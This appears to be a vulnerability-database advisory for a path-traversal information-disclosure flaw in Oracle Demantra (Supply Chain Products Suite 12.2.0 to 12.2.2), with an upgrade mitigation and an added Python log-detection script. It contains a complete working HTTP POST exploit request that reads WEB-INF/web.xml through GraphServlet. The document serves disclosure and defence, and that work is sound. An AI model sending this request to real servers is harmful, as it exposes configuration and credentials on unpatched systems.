Vendor: Oracle Supply Chain Products Suite
By: SecurityFocus
CVSS: 8.8 (HIGH)
Remote Vulnerability
CWE: 200
Product Name: Oracle Supply Chain Products Suite
Affected Version From: 12.2.0
Affected Version To: 12.2.2
Patch Exists: YES
Related CWE: N/A
CPE: oracle:demantra_demand_management
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2013

Oracle Supply Chain Products Suite Remote Vulnerability

Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management. Attackers can exploit this issue to obtain sensitive information by sending a POST request to the GraphServlet with the filename parameter set to the path of the web.xml file.

Mitigation:

Upgrade to Oracle Supply Chain Products Suite version 12.2.3 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/64836/info

Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management.

The vulnerability can be exploited over the 'HTTP' protocol. The 'DM Others' sub component is affected.

Attackers can exploit this issue to obtain sensitive information.

This vulnerability affects the following supported versions:
12.2.0, 12.2.1, 12.2.2

POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
Host: target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml
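Added detection example, not part of the advisory and not Oracle's or SecurityFocus's code: a small Python check a defender can run over proxy or WAF log records to flag requests shaped like the one above. The log records below are constructed; the check percent-decodes the path before normalising it so that an encoded traversal segment is scored the same as the literal one shown in the advisory, and it inspects the filename parameter whether it arrives in the query string or in the POST body.

```python
"""Flag HTTP requests that match the advisory's pattern: a request path that
resolves to GraphServlet via '..' segments, combined with a filename parameter
that names an absolute path, traverses directories, or points at WEB-INF/web.xml.
Added detection example; the sample records are constructed, not real traffic."""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample records in the shape of a proxy/WAF log export.
SAMPLE_REQUESTS = [
    {"id": 1, "method": "POST",
     "target": "/demantra/common/loginCheck.jsp/../../GraphServlet",
     "body": "filename=C:/Program Files (x86)/Oracle Demantra Spectrum/"
             "Collaborator/demantra/WEB-INF/web.xml"},
    {"id": 2, "method": "POST",
     "target": "/demantra/common/loginCheck.jsp",
     "body": "username=alice&password=secret"},
    {"id": 3, "method": "GET",
     "target": "/demantra/GraphServlet?filename=report1.png",
     "body": ""},
    {"id": 4, "method": "POST",
     "target": "/demantra/common/%2e%2e/%2e%2e/GraphServlet",
     "body": "filename=..%2F..%2FWEB-INF%2Fweb.xml"},
]

SENSITIVE_TARGET = re.compile(r"(web\.xml|WEB-INF)", re.IGNORECASE)
# Windows drive prefix (C:/ or C:\) or a POSIX/UNC-style leading slash.
ABSOLUTE_PATH = re.compile(r"^(?:[A-Za-z]:[\\/]|[\\/])")


def path_indicators(raw_path):
    """Indicators derived from the request path alone."""
    decoded = unquote(raw_path)  # decode once, as the container would
    found = []
    if ".." in decoded.split("/"):
        found.append("dot-dot segment in URL path")
    # Collapse '..' the way the servlet container resolves the target.
    if posixpath.normpath(decoded).lower().endswith("/graphservlet"):
        found.append("resolves to GraphServlet")
    return found


def filename_indicators(values):
    """Indicators derived from every filename parameter value seen."""
    found = []
    for value in values:
        decoded = unquote(value).replace("\\", "/")
        if ABSOLUTE_PATH.match(decoded):
            found.append("absolute path in filename")
        if ".." in decoded.split("/"):
            found.append("traversal in filename")
        if SENSITIVE_TARGET.search(decoded):
            found.append("filename references WEB-INF/web.xml")
    return found


def analyze(record):
    """Return the list of indicators for one log record."""
    parts = urlsplit(record["target"])
    filenames = (parse_qs(parts.query).get("filename", [])
                 + parse_qs(record["body"]).get("filename", []))
    return path_indicators(parts.path) + filename_indicators(filenames)


def score(indicators):
    """Map indicators to a severity: 'high', 'medium' or 'none'."""
    reaches_servlet = "resolves to GraphServlet" in indicators
    bad_filename = any(i.startswith(("absolute", "traversal", "filename references"))
                       for i in indicators)
    if reaches_servlet and bad_filename:
        return "high"
    if bad_filename or "dot-dot segment in URL path" in indicators:
        return "medium"
    return "none"


def run(records=SAMPLE_REQUESTS):
    """Score every record; returns {record id: severity}."""
    return {r["id"]: score(analyze(r)) for r in records}


if __name__ == "__main__":
    for rid, severity in run().items():
        print(rid, severity, analyze(SAMPLE_REQUESTS[rid - 1]))
```

A normal GraphServlet call with a plain relative filename (record 3) scores "none", so the rule keys on the combination of the traversal-reached servlet and a suspicious filename rather than on the servlet name alone; the decode-then-normalise step is what keeps record 4 from slipping past a literal string match.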